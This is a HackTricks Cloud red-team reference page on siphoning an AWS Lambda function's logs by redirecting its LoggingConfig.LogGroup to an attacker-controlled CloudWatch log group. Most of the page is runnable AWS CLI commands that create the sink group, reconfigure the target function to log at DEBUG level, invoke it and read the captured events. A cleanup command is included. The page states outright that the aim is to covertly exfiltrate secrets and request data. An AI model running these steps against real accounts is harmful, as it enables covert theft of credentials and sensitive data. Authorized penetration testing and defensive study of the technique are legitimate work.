HackTricks CloudAWS Lambda – Log Siphon via LoggingConfig.LogGroup Redirection
Reading time: 3 minutes
tip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Abuse lambda:UpdateFunctionConfiguration advanced logging controls to redirect a function’s logs to an attacker-chosen CloudWatch Logs log group. This works without changing code or the execution role (most Lambda roles already include logs:CreateLogGroup/CreateLogStream/PutLogEvents via AWSLambdaBasicExecutionRole). If the function prints secrets/request bodies or crashes with stack traces, you can collect them from the new log group.
Required permissions
- lambda:UpdateFunctionConfiguration
- lambda:GetFunctionConfiguration
- lambda:InvokeFunction (or rely on existing triggers)
- logs:CreateLogGroup (often not required if the function role has it)
- logs:FilterLogEvents (to read events)
Steps
- Create a sink log group
aws logs create-log-group --log-group-name "/aws/hacktricks/ht-log-sink" --region us-east-1 || true
- Redirect the target function logs
aws lambda update-function-configuration \
--function-name <TARGET_FN> \
--logging-config LogGroup=/aws/hacktricks/ht-log-sink,LogFormat=JSON,ApplicationLogLevel=DEBUG \
--region us-east-1
Wait until LastUpdateStatus becomes Successful:
aws lambda get-function-configuration --function-name <TARGET_FN> \
--query LastUpdateStatus --output text
- Invoke and read from the sink
aws lambda invoke --function-name <TARGET_FN> /tmp/out.json --payload '{"ht":"log"}' --region us-east-1 >/dev/null
sleep 5
aws logs filter-log-events --log-group-name "/aws/hacktricks/ht-log-sink" --limit 50 --region us-east-1 --query 'events[].message' --output text
Impact
- Covertly redirect all application/system logs to a log group you control, bypassing expectations that logs only land in
/aws/lambda/<fn>. - Exfiltrate sensitive data printed by the function or surfaced in errors.
Cleanup
aws lambda update-function-configuration --function-name <TARGET_FN> \
--logging-config LogGroup=/aws/lambda/<TARGET_FN>,LogFormat=Text,ApplicationLogLevel=INFO \
--region us-east-1 || true
Notes
- Logging controls are part of Lambda’s
LoggingConfig(LogGroup, LogFormat, ApplicationLogLevel, SystemLogLevel). - By default, Lambda sends logs to
/aws/lambda/<function>, but you can point to any log group name; Lambda (or the execution role) will create it if allowed.
tip
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.